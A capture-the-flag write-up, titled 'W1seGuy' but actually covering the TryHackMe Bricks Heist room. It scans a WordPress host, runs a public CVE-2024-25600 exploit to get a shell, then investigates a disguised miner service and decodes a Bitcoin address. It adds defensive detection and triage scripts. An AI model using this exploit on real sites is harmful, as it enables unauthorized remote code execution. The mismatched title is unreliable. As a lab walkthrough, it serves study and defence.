
TryHackMe - W1seGuy

5 min read · azadin


A w1se guy 0nce said, the answer is usually as plain as day.

Title: W1seGuy
Description: A w1se guy 0nce said, the answer is usually as plain as day.
Points: 60
Difficulty: Easy
Maker: DrGonz0, hadrian3689

Summary

TryHack3M: Bricks Heist. In this machine we exploit a vulnerable WordPress theme, which gives us unauthenticated RCE. Once in, we investigate the heist: from a suspicious service on the box to the threat group behind it.


Foothold

Starting with an nmap scan. Port 80 is a Python http.server (WebSockify) that only returns an error page, and MySQL on 3306 is open but answers "unauthorized" to our host, so neither is useful. The WordPress site on 443 is the way in.

┌──(azadin)-[~/tryhackme]
└─$ nmap -p$ports -sC -sV -Pn -n 10.10.131.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-03 23:02 UTC
Nmap scan report for 10.10.131.51
Host is up (0.65s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7a:59:9b:e6:2b:a5:38:55:ef:9a:c5:6f:c7:b7:0a:99 (RSA)
|   256 0e:c7:51:cc:8f:27:6d:bb:89:ca:84:62:a8:e2:42:f2 (ECDSA)
|_  256 f9:a1:1a:f4:8c:77:90:b2:e2:d1:38:47:ea:96:fc:5e (ED25519)
80/tcp   open  http     Python http.server 3.5 - 3.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
443/tcp  open  ssl/http Apache httpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-generator: WordPress 6.5
| tls-alpn: 
|   h2
|_  http/1.1
|_http-title: Brick by Brick
|_http-server-header: Apache
3306/tcp open  mysql    MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.55 seconds

Since we are dealing with WordPress, let's enumerate further with wpscan. The site is reached as bricks.thm (the room's hostname, mapped to the target IP in /etc/hosts), and --disable-tls-checks is needed because the certificate (an "Internet Widgits Pty Ltd" placeholder that expired on 2025-04-02, before this scan) does not validate:

┌──(azadin)-[~/tryhackme]
└─$ wpscan --url https://bricks.thm/ -e u,vp --no-update --disable-tls-checks
....
[+] WordPress theme in use: bricks
 | Location: https://bricks.thm/wp-content/themes/bricks/
 | Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
 | Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
 | Style Name: Bricks
 | Style URI: https://bricksbuilder.io/
 | Description: Visual website builder for WordPress....
 | Author: Bricks
 | Author URI: https://bricksbuilder.io/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.9.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
.....

This is the interesting part: the theme is Bricks Builder 1.9.5 (wpscan reports that at 80% confidence, taken from the Version: line in style.css). Bricks up to and including 1.9.6 is affected by CVE-2024-25600: the theme exposes a REST route, /wp-json/bricks/v1/render_element, that passes attacker-controlled element settings to eval(), and it can be called without logging in because the only thing it checks is a REST nonce that the site's front page hands out in its JavaScript. I used the following exploit:
https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT

and ran it against the site:

┌──(.venv)─(azadin)-[~/tryhackme]
└─$ python CVE-2024-25600.py -u https://bricks.thm -t 5
/home/chida/sus/oo/ok/CVE-2024-25600.py:20: SyntaxWarning: invalid escape sequence '\ '
  / ____/ |  / / ____/   |__ \ / __ \__ \/ // /      |__ \ / ____/ ___// __ \/ __ \\

   _______    ________    ___   ____ ___  __ __       ___   ___________ ____  ____
  / ____/ |  / / ____/   |__ \ / __ \__ \/ // /      |__ \ / ____/ ___// __ \/ __ \
 / /    | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / /
/ /___  | |/ / /__/_____/ __// /_/ / __/__  __/_____/ __/____/ / /_/ / /_/ / /_/ /
\____/  |___/_____/    /____/\____/____/ /_/       /____/_____/\____/\____/\____/
    
Coded By: K3ysTr0K3R --> Hello, Friend!

[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://bricks.thm
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> 

and we have a shell.
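Two checks I would add around this finding, as an added example rather than code from the write-up or from the linked exploit: a version gate that confirms 1.9.5 falls in the affected range (the fix shipped in Bricks 1.9.6.1, so 1.9.6 and below are affected), and a hunt over the web server's access log for the REST route the exploit posts to, since the rest of this room is an investigation of exactly this host. The style.css header and the log lines are constructed for the example; the IPs, timestamps and sizes in them are made up.

```python
import re
from typing import Iterable, List, Optional, Tuple

FIXED_IN = (1, 9, 6, 1)                    # first Bricks release that closed the hole
RENDER_ROUTE = "bricks/v1/render_element"   # REST route the exploit posts to

# Constructed theme header in the layout WordPress uses; the real file is at
# /wp-content/themes/bricks/style.css and is what wpscan read the version from.
SAMPLE_STYLE_CSS = """\
/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Version: 1.9.5
*/
"""

# Constructed Apache "combined" log lines; IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.9.1.5 - - [08/Apr/2024:10:40:01 +0000] "GET / HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
10.9.1.5 - - [08/Apr/2024:10:40:02 +0000] "POST /wp-json/bricks/v1/render_element HTTP/1.1" 200 412 "-" "python-requests/2.31"
10.9.1.5 - - [08/Apr/2024:10:40:03 +0000] "POST /index.php?rest_route=/bricks/v1/render_element HTTP/1.1" 200 398 "-" "python-requests/2.31"
10.9.2.7 - - [08/Apr/2024:10:41:10 +0000] "GET /wp-json/bricks/v1/render_element HTTP/1.1" 401 97 "-" "curl/8.0"
10.9.2.7 - - [08/Apr/2024:10:41:11 +0000] "GET /wp-login.php HTTP/1.1" 200 6200 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_version(v: str) -> Tuple[int, ...]:
    """'1.9.6.1' -> (1, 9, 6, 1); stops at the first non-numeric component."""
    out: List[int] = []
    for part in v.strip().split("."):
        if not part.isdigit():
            break
        out.append(int(part))
    return tuple(out)


def version_from_style_css(css: str) -> Optional[str]:
    """The 'Version:' header line of a theme's style.css."""
    m = re.search(r"^\s*Version:\s*(\S+)", css, re.MULTILINE)
    return m.group(1) if m else None


def is_vulnerable(version: str) -> bool:
    """True for any Bricks release before 1.9.6.1 (tuple order makes 1.9.6 < 1.9.6.1)."""
    return parse_version(version) < FIXED_IN


def render_element_requests(lines: Iterable[str]) -> List[dict]:
    """Every request that reached the render_element route, in either URL form
    (/wp-json/... or index.php?rest_route=...)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and RENDER_ROUTE in m.group("path"):
            hits.append(m.groupdict())
    return hits


if __name__ == "__main__":
    ver = version_from_style_css(SAMPLE_STYLE_CSS)
    print(f"Bricks {ver}: {'vulnerable' if ver and is_vulnerable(ver) else 'patched'}")
    for hit in render_element_requests(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['path']} -> {hit['status']} ({hit['ua']})")
```

render_element is a legitimate builder endpoint, used by the editor when someone is building a page, so a hit on its own is not proof. The pattern to pull out is calls from a scripting user agent such as python-requests right after a GET of the front page (where the exploit collects the nonce), with no editor session behind them.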

Flags

The shell lands in the web root, and the first flag is the .txt file sitting there:

Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php

Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}

Next we need to find the suspicious process. Listing the running units:

systemctl | grep running

  ubuntu.service                                   loaded active     running   TRYHACK3M

One entry stands out: a unit called ubuntu.service with the description TRYHACK3M, which is neither a stock Ubuntu unit nor anything a legitimate package would install. Let's investigate this service further.

A unit installed by hand lives under /etc/systemd/system (package-shipped units live under /lib/systemd/system), so the file should be /etc/systemd/system/ubuntu.service; systemctl cat prints it together with its path, which saves the guessing:

-> systemctl cat ubuntu.service
# /etc/systemd/system/ubuntu.service
[Unit]
Description=TRYHACK3M

[Service]
Type=simple
ExecStart=/lib/NetworkManager/nm-inet-dialog
Restart=on-failure

[Install]
WantedBy=multi-user.target
apache@tryhackme:/etc/systemd/system$ 

So we have the name of the suspicious process, nm-inet-dialog, and the service associated with it, ubuntu.service. The binary sits in /lib/NetworkManager next to NetworkManager's genuine helpers, a location and name chosen to blend in; a quick way to show it is not part of the network-manager package is dpkg -S on the path, which reports no owner for it.
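The same hunt, written down so it can be repeated on any Linux host, as an added example (not code from the write-up): a small parser for systemd unit files and a triage function that applies the three indicators used above, a unit file outside the package-managed directories, an ExecStart binary that no dpkg package owns, and a Restart= setting that keeps the process alive. On a host with systemctl it walks every running service; without one it runs on the ubuntu.service text captured above, with the "unowned" answer supplied by hand since dpkg is assumed to be absent there.

```python
import os
import shutil
import subprocess
from typing import Dict, List, Optional, Tuple

# Unit text from `systemctl cat ubuntu.service` above, kept inline so the triage
# runs offline; on a live host the loop at the bottom pulls units from systemctl.
UBUNTU_SERVICE = """\
[Unit]
Description=TRYHACK3M

[Service]
Type=simple
ExecStart=/lib/NetworkManager/nm-inet-dialog
Restart=on-failure

[Install]
WantedBy=multi-user.target
"""

# Where distribution packages install their unit files; anything elsewhere
# (typically /etc/systemd/system) was put there by an admin or an attacker.
PACKAGE_UNIT_DIRS = ("/lib/systemd/system/", "/usr/lib/systemd/system/")


def parse_unit(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for systemd's INI-like unit syntax; later keys overwrite
    earlier ones, and the '# /path' lines that `systemctl cat` adds are skipped."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def exec_start_binary(unit: Dict[str, Dict[str, str]]) -> Optional[str]:
    """First word of ExecStart without systemd's prefix characters (-, @, :, +, !)."""
    cmd = unit.get("Service", {}).get("ExecStart", "")
    return cmd.split()[0].lstrip("-@:+!") if cmd else None


def dpkg_owner(path: str) -> Optional[str]:
    """Package owning `path` per `dpkg -S`: '' when no package claims it, None when
    dpkg is not installed here. Both the given path and its resolved form are tried
    because merged-/usr systems record /lib paths as /usr/lib."""
    if shutil.which("dpkg") is None:
        return None
    for candidate in dict.fromkeys([path, os.path.realpath(path)]):
        r = subprocess.run(["dpkg", "-S", candidate], capture_output=True, text=True)
        if r.returncode == 0:
            return r.stdout.split(":", 1)[0].strip()
    return ""


def triage_unit(fragment_path: str, text: str, owner: Optional[str] = None) -> List[Tuple[str, str]]:
    """Heuristic indicators as (severity, message). `owner` overrides the dpkg
    lookup so the check can run where dpkg is absent ('' = checked, unowned)."""
    unit = parse_unit(text)
    service = unit.get("Service", {})
    binary = exec_start_binary(unit)
    findings: List[Tuple[str, str]] = []
    if not fragment_path.startswith(PACKAGE_UNIT_DIRS):
        findings.append(("medium", f"unit file {fragment_path} was installed locally, not by a package"))
    if binary:
        if owner is None:
            owner = dpkg_owner(binary)
        if owner == "":
            findings.append(("high", f"ExecStart binary {binary} is not owned by any dpkg package"))
    if service.get("Restart", "no") != "no":
        findings.append(("info", f"Restart={service['Restart']} revives the process if it is killed"))
    return findings


def triage_running_services() -> Dict[str, List[Tuple[str, str]]]:
    """Tighter form of `systemctl | grep running`: every running .service unit,
    with its unit-file path, run through triage_unit."""
    listing = subprocess.run(
        ["systemctl", "list-units", "--type=service", "--state=running", "--no-legend", "--plain"],
        capture_output=True, text=True).stdout
    results: Dict[str, List[Tuple[str, str]]] = {}
    for line in listing.splitlines():
        if not line.strip():
            continue
        name = line.split()[0]
        path = subprocess.run(["systemctl", "show", "-p", "FragmentPath", "--value", name],
                              capture_output=True, text=True).stdout.strip()
        text = subprocess.run(["systemctl", "cat", "--no-pager", name],
                              capture_output=True, text=True).stdout
        results[name] = triage_unit(path, text)
    return results


if __name__ == "__main__":
    if shutil.which("systemctl"):
        report = triage_running_services()
    else:  # no systemd here: demonstrate on the unit captured from the target
        report = {"ubuntu.service": triage_unit("/etc/systemd/system/ubuntu.service", UBUNTU_SERVICE, owner="")}
    for name, findings in report.items():
        for severity, message in findings:
            print(f"{severity:6} {name}: {message}")
```

The Restart= indicator fires on plenty of legitimate units (sshd uses it too), which is why it is rated info; the unowned-binary check is the one that separates a planted helper like nm-inet-dialog from the genuine files in the same directory.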

Let's dig into /lib/NetworkManager. Next to the binary is inet.conf, which despite the name is the miner's log file:

2024-04-08 10:46:20,757 [*] Miner()
2024-04-08 10:46:22,760 [*] Miner()
2024-04-08 10:46:24,762 [*] Miner()
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:48:04,647 [*] confbak: Ready!
2024-04-08 10:48:04,648 [*] Status: Mining!
2024-04-08 10:48:08,649 [*] Miner()
2024-04-08 10:48:08,649 [*] Bitcoin Miner Thread Started
2024-04-08 10:48:08,649 [*] Status: Mining!
2024-04-08 10:48:10,651 [*] Miner()

The ID line is a hex string; decoding it yields base64, which decodes to base64 again, and that finally gives the payload:

┌──(.venv)─(azadin㉿kali)-[~/tryhackme]
└─$ echo "5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d" | xxd -r -p | base64 -d | base64 -d
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa

These are two Bitcoin addresses run together. The first, bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa, is the one we want; the second differs from it only by an inserted character (had5 instead of hd5), which makes it 43 characters long, one more than a valid P2WPKH bech32 address.
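The decode and the split done deterministically, as an added example (not code from the write-up): the same hex, base64, base64 chain as the shell pipeline above, a split of the result at each bc1 prefix, and a bech32/bech32m validator (BIP 173 and BIP 350) so that each candidate is judged by its checksum and program length rather than by eye. ID_HEX is the value from inet.conf; the validator is a from-scratch implementation of the published algorithm, not taken from any wallet library.

```python
import base64
import binascii
import re
from typing import List, Tuple

# The ID value from inet.conf above.
ID_HEX = (
    "5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b"
    "616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a"
    "526d685a6255313459316873636b35366247315a4d304531595564476130355864486c61"
    "57454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a"
    "546d706b65466c525054303d"
)

BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
BECH32_CONST, BECH32M_CONST = 1, 0x2BC830A3   # witness v0 / v1+ checksum constants


def decode_id(hex_string: str) -> str:
    """hex -> base64 -> base64, the same as `xxd -r -p | base64 -d | base64 -d`."""
    raw = binascii.unhexlify(hex_string.strip())
    inner = base64.b64decode(raw, validate=True)
    return base64.b64decode(inner, validate=True).decode("ascii")


def split_candidates(blob: str, hrp: str = "bc") -> List[str]:
    """Split concatenated addresses at each 'bc1'. The '1' separator never occurs in
    a bech32 data part, so that boundary cannot be hit inside an address."""
    return [part for part in re.split(rf"(?={hrp}1)", blob) if part]


def _polymod(values: List[int]) -> int:
    """BIP 173 checksum polynomial."""
    gen = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk


def _hrp_expand(hrp: str) -> List[int]:
    return [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]


def bech32_check(addr: str) -> Tuple[bool, str]:
    """Validate a native segwit address (BIP 173 / BIP 350): alphabet, checksum,
    witness version vs. checksum variant, and program length. Returns (ok, reason)."""
    if addr != addr.lower() and addr != addr.upper():
        return False, "mixed case"
    addr = addr.lower()
    sep = addr.rfind("1")
    if sep < 1 or sep + 7 > len(addr) or len(addr) > 90:
        return False, "bad length or missing '1' separator"
    hrp, data = addr[:sep], addr[sep + 1:]
    if any(c not in BECH32_CHARSET for c in data):
        return False, "character outside the bech32 alphabet"
    values = [BECH32_CHARSET.index(c) for c in data]
    const = _polymod(_hrp_expand(hrp) + values)
    if const not in (BECH32_CONST, BECH32M_CONST):
        return False, "checksum mismatch"
    version, program = values[0], values[1:-6]
    if version > 16 or (version == 0) != (const == BECH32_CONST):
        return False, f"witness version {version} does not match the checksum variant"
    nbits = len(program) * 5
    if nbits % 8 > 4:
        return False, "witness program does not pack into whole bytes"
    nbytes = nbits // 8
    if version == 0 and nbytes not in (20, 32):
        return False, f"v0 program must be 20 or 32 bytes, got {nbytes}"
    variant = "bech32" if const == BECH32_CONST else "bech32m"
    return True, f"{variant}, witness v{version}, {nbytes}-byte program"


if __name__ == "__main__":
    blob = decode_id(ID_HEX)
    print("decoded:", blob)
    for cand in split_candidates(blob):
        ok, why = bech32_check(cand)
        print(f"{'valid  ' if ok else 'INVALID'} {cand} ({len(cand)} chars): {why}")
```

The second candidate carries 33 five-bit groups of witness program, 165 bits, which cannot pack into whole bytes, so it fails regardless of its checksum; that is the one to drop before spending any OSINT effort on the wallet.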

Looking the address up online (blockchain explorers and public reporting on ransomware payment addresses) links it to the LockBit ransomware group.

Written by azadin, Cybersecurity Engineer